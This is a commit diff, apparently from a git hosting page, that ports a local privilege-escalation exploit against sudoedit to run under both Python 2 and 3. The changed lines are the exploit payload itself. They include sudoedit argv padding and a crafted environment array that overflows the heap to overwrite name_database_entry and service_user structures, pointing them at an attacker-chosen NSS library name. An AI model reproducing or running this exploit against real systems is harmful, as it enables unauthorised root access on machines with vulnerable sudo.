Ensure exploit is compatible with both python3 and python2
This commit is contained in:
parent
9d9d3ce061
commit
0ee1d5fbe3
|
@ -73,13 +73,13 @@ argv = [ b"sudoedit", b"-A", b"-s", b"a", b"a", b"A"*(TARGET_CMND_SIZE-0x10-4)+b
|
|||
|
||||
env = [
|
||||
b"A"*0xae+b"\\",
|
||||
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # name_database_entry->next
|
||||
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # name_database_entry->service
|
||||
"group\\", "A\\", # name_database_entry->name
|
||||
b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", # name_database_entry->next
|
||||
b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", # name_database_entry->service
|
||||
b"group\\", b"A\\", # name_database_entry->name
|
||||
b"A"*0x27+b"\\",
|
||||
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # service_user->library
|
||||
"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", # service_user->known
|
||||
libnss_name, # service_user->name
|
||||
b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", # service_user->library
|
||||
b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", b"\\", # service_user->known
|
||||
libnss_name.encode('latin-1'), # service_user->name
|
||||
b"LC_MESSAGES=C_zzzzzzzz.UTF-8@"+b"L"*0xd0+b";a=a",
|
||||
b"LC_PAPER=C_gggg.UTF-8@"+b"L"*0x30,
|
||||
b"LC_NAME=C_gggg.UTF-8@"+b"L"*0x4,
|
||||
|
|
Loading…
Reference in New Issue